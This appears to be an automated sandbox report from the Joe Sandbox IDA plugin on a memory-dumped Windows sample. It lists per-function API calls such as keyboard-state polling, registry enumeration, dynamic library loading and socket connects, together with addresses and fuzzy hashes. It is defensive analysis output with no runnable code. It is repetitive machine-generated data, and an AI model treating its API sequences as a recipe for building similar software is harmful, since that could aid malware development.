                                                                                                                  • Part of subcall function 0023D623: GetCurrentThreadId.KERNEL32 ref: 0023D65A
                                                                                                                  • Part of subcall function 0023D623: AttachThreadInput.USER32(00000000), ref: 0023D661
                                                                                                                • GetFocus.USER32 ref: 0023D7FB
                                                                                                                  • Part of subcall function 0023D66C: GetParent.USER32(?), ref: 0023D67A
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0023D844
                                                                                                                • EnumChildWindows.USER32(?,0023D8BA), ref: 0023D86C
                                                                                                                • __swprintf.LIBCMT ref: 0023D886
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 1941087503-1110647743
                                                                                                                • Opcode ID: f1d2509eec9799484c86df8f49292d9eb5d027896de45d178f18209a54685ef7
                                                                                                                • Instruction ID: 9fd816290486b9071de703e6f0fe7711381322cc744dedd0f4f3fc3f1df602e4
                                                                                                                • Opcode Fuzzy Hash: f1d2509eec9799484c86df8f49292d9eb5d027896de45d178f18209a54685ef7
                                                                                                                • Instruction Fuzzy Hash: EB11B4B59202096BDF11BFA0FC86FEA376DAB44704F0040B5BE19AA186DBB469558F70
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 00228768
                                                                                                                  • Part of subcall function 00228984: __mtinitlocknum.LIBCMT ref: 00228996
                                                                                                                  • Part of subcall function 00228984: EnterCriticalSection.KERNEL32(00220127,?,0022876D,0000000D), ref: 002289AF
                                                                                                                • InterlockedIncrement.KERNEL32(DC840F00), ref: 00228775
                                                                                                                • __lock.LIBCMT ref: 00228789
                                                                                                                • ___addlocaleref.LIBCMT ref: 002287A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                • String ID: P(
                                                                                                                • API String ID: 1687444384-3673270426
                                                                                                                • Opcode ID: efa90797593884bfe62e2effa1a3dc634d8c3ccb65f68b98dd3af888dc6c4ae1
                                                                                                                • Instruction ID: 94f5c06eecfca1dd79d230c7d3caf8e519859e59d6112d6b68ce5642102db4e8
                                                                                                                • Opcode Fuzzy Hash: efa90797593884bfe62e2effa1a3dc634d8c3ccb65f68b98dd3af888dc6c4ae1
                                                                                                                • Instruction Fuzzy Hash: F2016D75426B10EFE720EFA5E809759F7E0BF44325F20890EE599872A0CB74A654CF01
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002618E4
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00261917
                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00261A3A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00261AB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364364464-0
                                                                                                                • Opcode ID: b4e45396a8c32a3d2519e285c3917103864768491d3ccfb42ffacbe8eb028e4c
                                                                                                                • Instruction ID: 4026bc8e883a8f6f3e5e8136e04121bb08fe58f9c32d45d2754e7ef7c43bd7a3
                                                                                                                • Opcode Fuzzy Hash: b4e45396a8c32a3d2519e285c3917103864768491d3ccfb42ffacbe8eb028e4c
                                                                                                                • Instruction Fuzzy Hash: 7F818174A60305EBDB149F64C886BAD7BE5AF44720F188059F905AF3C2D7B4ADA4CF90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0026DFE5
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0026E01D
                                                                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0026E058
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0026E079
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0026E091
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188977179-0
                                                                                                                • Opcode ID: 7a7535dc25bac8394a8a3d27f9790657c11e95d11fd70548cc41ed52c6db9fbe
                                                                                                                • Instruction ID: 008d9ac895dc49c076c02ed3836f23413bb98d563a5b6f756d50861d8990bfe4
                                                                                                                • Opcode Fuzzy Hash: 7a7535dc25bac8394a8a3d27f9790657c11e95d11fd70548cc41ed52c6db9fbe
                                                                                                                • Instruction Fuzzy Hash: FB61E275F24209AFEB20CF54C895FEA77F6AF4A300F104599F45A973A2C771A9A0CB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002605DF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0026066E
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0026068C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 002606D2
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 002606EC
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0024AEA5,?,?,00000000,00000008), ref: 0021F282
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0024AEA5,?,?,00000000,00000008), ref: 0021F2A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327935632-0
                                                                                                                • Opcode ID: 3fc00f4ea4e82516e47dbeb4cf0dbc080d5d3e21e14216027d3b9c6b91fec630
                                                                                                                • Instruction ID: f0aa334b7e4094b3f3c478be1e366f6209405093cda6144871ffae425f420397
                                                                                                                • Opcode Fuzzy Hash: 3fc00f4ea4e82516e47dbeb4cf0dbc080d5d3e21e14216027d3b9c6b91fec630
                                                                                                                • Instruction Fuzzy Hash: 96515C75A20206DFCB00EFA8C4949AEB7B9BF58310B148055E955AB392DB30ED65DF90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00262DE0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00262E1F
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00262E66
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00262E92
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00262E9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440857362-0
                                                                                                                • Opcode ID: 04739082e02d481bcd0a57803b3b98c27ba51d97658f251189fbe9685d6eebbc
                                                                                                                • Instruction ID: 985f25b097d556b33484dbb3bc6ef0091d31efb4967350648f089b8b0c3805fe
                                                                                                                • Opcode Fuzzy Hash: 04739082e02d481bcd0a57803b3b98c27ba51d97658f251189fbe9685d6eebbc
                                                                                                                • Instruction Fuzzy Hash: 96513A71224305AFD704EF64C881E6BB7E8BF88304F14492EF5958B1A2DB71E969CF52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 50682001d2604290b20cfe1542125da3c31e495aaa76f92b7ceed606a757ae4d
                                                                                                                • Instruction ID: 1f8362f7f92a9e75277f847e90d29cf729131ea1fb8b4f3421329d11d5420237
                                                                                                                • Opcode Fuzzy Hash: 50682001d2604290b20cfe1542125da3c31e495aaa76f92b7ceed606a757ae4d
                                                                                                                • Instruction Fuzzy Hash: B6412639920105AFD724FF38DC49FB9BB68EB0A320F244256F899A72D1C7709DA0D790
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002517D4
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002517FD
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0025183C
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00251861
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00251869
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1389676194-0
                                                                                                                • Opcode ID: 015f4e55f0320e41e4c11a5c1b1d4632b71988b963d10b05bcbf71e178bc43b8
                                                                                                                • Instruction ID: b8e3e1eccd84c05c0718e098fef665a4e9e5980d140e8df553b211a97a4e1ad1
                                                                                                                • Opcode Fuzzy Hash: 015f4e55f0320e41e4c11a5c1b1d4632b71988b963d10b05bcbf71e178bc43b8
                                                                                                                • Instruction Fuzzy Hash: F8413B35A10205DFDB15EF64C985EAEBBF5EF08310B148099E845AB3A2DB31ED25DF50
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(000000FF), ref: 0021B749
                                                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 0021B766
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 0021B78B
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 0021B799
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: cb3f84483d125478add71d01c486fd98949a8a3191e4d8f68df648ffdce24c14
                                                                                                                • Instruction ID: 727ebe63777b0f5e089f676dff0050ff6cf1c611f76d029c425ad5d854aba53a
                                                                                                                • Opcode Fuzzy Hash: cb3f84483d125478add71d01c486fd98949a8a3191e4d8f68df648ffdce24c14
                                                                                                                • Instruction Fuzzy Hash: 3E41603551411AFFDF169F64C844EE9BBB4BB59330F20835AF829962D0C731A9A0DFA0
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0023C156
                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0023C200
                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0023C208
                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0023C216
                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0023C21E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: 3ad66734e97095c5174a0ccd7020eb833c478cd0777549fb058c4633275e1b33
                                                                                                                • Instruction ID: cb935fd2f4b3ed6935371d7340e5f7db09a5081fbf0e9d0bccb3407001ce25e4
                                                                                                                • Opcode Fuzzy Hash: 3ad66734e97095c5174a0ccd7020eb833c478cd0777549fb058c4633275e1b33
                                                                                                                • Instruction Fuzzy Hash: 8731B1B151021EEBDF14CFA8DD4DA9E3BB5EF04315F204225F969A71D1C7B09914DB90
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 0023E9CD
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0023E9EA
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0023EA22
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0023EA48
                                                                                                                • _wcsstr.LIBCMT ref: 0023EA52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902887630-0
                                                                                                                • Opcode ID: 37a8038368f1302703a9836e67bdbde990c87076badce2abe8a63ad1cf4ffb2d
                                                                                                                • Instruction ID: 4257f2f169e3f2e8d0d95602ee47644552c5f81e6da605979f20ca5724ca0443
                                                                                                                • Opcode Fuzzy Hash: 37a8038368f1302703a9836e67bdbde990c87076badce2abe8a63ad1cf4ffb2d
                                                                                                                • Instruction Fuzzy Hash: 902149B2214214BBEF15AF69FC49E7B7BACDF45710F018029F809CA0D1EA60DC648750
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026DCC0
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0026DCE4
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0026DCFC
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0026DD24
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0025407D,00000000), ref: 0026DD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2294984445-0
                                                                                                                • Opcode ID: 3e58661c159e01a6c15090f9d8c63d5e3e6f31f73eb87b318a941f6aea493f82
                                                                                                                • Instruction ID: 53f7aab23e11c83c575532f08f8d76871fa91639d362722fd0bcf7cb4076b023
                                                                                                                • Opcode Fuzzy Hash: 3e58661c159e01a6c15090f9d8c63d5e3e6f31f73eb87b318a941f6aea493f82
                                                                                                                • Instruction Fuzzy Hash: 9121D672B2421AAFCB206F789C48B6A37A4FB46374F110725F926C61E0D37098B0CB80
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0023CA86
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0023CAB8
                                                                                                                • __itow.LIBCMT ref: 0023CAD0
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0023CAF6
                                                                                                                • __itow.LIBCMT ref: 0023CB07
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2983881199-0
                                                                                                                • Opcode ID: dd05f8043789e3676a5c6e20d6b347c9b6039c0d12e2e03643c2e8d4442c6aa9
                                                                                                                • Instruction ID: d0f5a0f196914f6ef6c07bd44563fbbd0ef7733e14de81108a721cab2219c3b2
                                                                                                                • Opcode Fuzzy Hash: dd05f8043789e3676a5c6e20d6b347c9b6039c0d12e2e03643c2e8d4442c6aa9
                                                                                                                • Instruction Fuzzy Hash: 2E21F9B67203187BDB10EE649C47EDE7BADAF49754F104024F905F7182E671CD2987A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203B1E: _wcsncpy.LIBCMT ref: 00203B32
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00246DBA
                                                                                                                • GetLastError.KERNEL32 ref: 00246DC5
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00246DD9
                                                                                                                • _wcsrchr.LIBCMT ref: 00246DFB
                                                                                                                  • Part of subcall function 00246D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00246E31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3633006590-0
                                                                                                                • Opcode ID: b457a85cec1623d5f92e086fc7c4e2385473b0fd3294d5a1953751d7f2bf024b
                                                                                                                • Instruction ID: 4e4fe4c3c2553f5c50a7ce35a6f4a0f8fa7ebd1fbe77db2d1cefb407616778e8
                                                                                                                • Opcode Fuzzy Hash: b457a85cec1623d5f92e086fc7c4e2385473b0fd3294d5a1953751d7f2bf024b
                                                                                                                • Instruction Fuzzy Hash: D421D875B2131696DB286BB4EC4EEEA33DC8F06710F600555E425C70D2EB60CDA48E52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0025ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00259160
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0025916F
                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 0025918B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
